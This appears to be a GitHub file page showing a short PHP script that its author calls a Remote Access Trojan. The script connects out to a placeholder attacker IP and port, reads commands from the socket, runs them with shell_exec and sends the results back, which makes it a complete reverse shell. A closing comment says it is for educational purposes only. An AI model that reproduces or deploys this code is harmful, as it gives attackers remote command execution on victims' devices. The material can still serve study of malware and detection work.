-
Notifications
You must be signed in to change notification settings - Fork 2
/
PHP_RAT_Malware.php
35 lines (26 loc) · 1.35 KB
/
PHP_RAT_Malware.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
// Created August 8th, 2023 - By: Devon Griffith A.K.A. rootPHAGE / 我爱数据
// Run on Windows [ php <path to file>\PHP_RAT_Malware.php ]
// This is a RAT (Remote Access Trojan) which allows an attacker to execute commands on
// the victim's device when the script opens a connection to the attacker's IP and port
<?php
function execute_command($command) {
return shell_exec($command);
}
$attacker_ip = 'ATTACKER_IP'; // This is where the attacker's IP goes
$attacker_port = ATTACKER_PORT; // This is where the attacker's port goes
try {
$s = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); // Create a web socket for the attacker to send the commands
socket_connect($s, $attacker_ip, $attacker_port);
while (true) {
$command = socket_read($s, 1024, PHP_NORMAL_READ); // Take in the commands from the attacker
if (strtolower(trim($command)) == 'exit') { // This is how the attacker can terminate the connection
break;
}
$output = execute_command($command); // Execute the command and the next line sends the output back to the attacker
socket_write($s, $output, strlen($output));
}
socket_close($s); // Close the web socket that is created to allow the attacker to access the device
} catch (Exception $e) {
}
?>
// DO NOT USE THIS SCRIPT MALICIOUSLY - PROVIDED FOR EDUCATIONAL PURPOSES ONLY